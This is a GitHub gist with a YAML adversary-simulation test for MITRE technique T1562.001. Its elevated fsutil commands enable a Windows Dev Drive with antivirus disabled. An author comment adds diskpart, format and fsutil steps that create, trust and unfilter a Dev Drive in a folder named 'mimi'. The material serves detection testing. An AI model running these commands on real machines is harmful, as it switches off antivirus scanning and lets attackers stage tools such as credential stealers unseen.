Skip to content

Instantly share code, notes, and snippets.

@MHaggis

MHaggis/T1562.001.yaml

Created November 8, 2023 17:32
Show Gist options
  • Save MHaggis/1d94c11f5c06c9d5ef32fb440edf0f05 to your computer and use it in GitHub Desktop.
Save MHaggis/1d94c11f5c06c9d5ef32fb440edf0f05 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
T1562.001.yaml
- name: Enable Dev Drive With Disabled AV Using Fsutil
description: |
This test simulates an adversary enabling a Developer Drive using fsutil.exe with arguments that disable antivirus (AV) on the created drive.
This technique requires administrative privileges and is relevant for Windows 11 environments starting with Build #10.0.22621.2338 or later.
The execution of this command should be closely monitored and flagged in production environments.
Ref. https://x.com/0gtweet/status/1720419490519752955?s=20 and https://x.com/Kostastsale/status/1721271281705001306?s=20
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
command: |
fsutil.exe devdrv enable
fsutil.exe devdrv enable /disallowav
@MHaggis
Copy link
Author

MHaggis commented Nov 8, 2023

Bonus points:

md c:\temp\mimi 
cd /d c:\temp\mimi
echo create vdisk file="c:\temp\mimi\mimi.vhdx" maximum=10240 type=expandable >> diskpart.txt
echo select vdisk file="c:\temp\mimi\mimi.vhdx" >> diskpart. txt 
echo attach vdisk >>diskpart.txt
echo assign letter=b >> diskpart.txt 
echo exit >> diskpart.txt

diskpart /s c: \temp\mimi\diskpart.txt

format b: /devdrv /q /y

fsutil devdrv clearFiltersAllowed b:
fsutil devdrv trust b:
fsutil devdrv query b:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment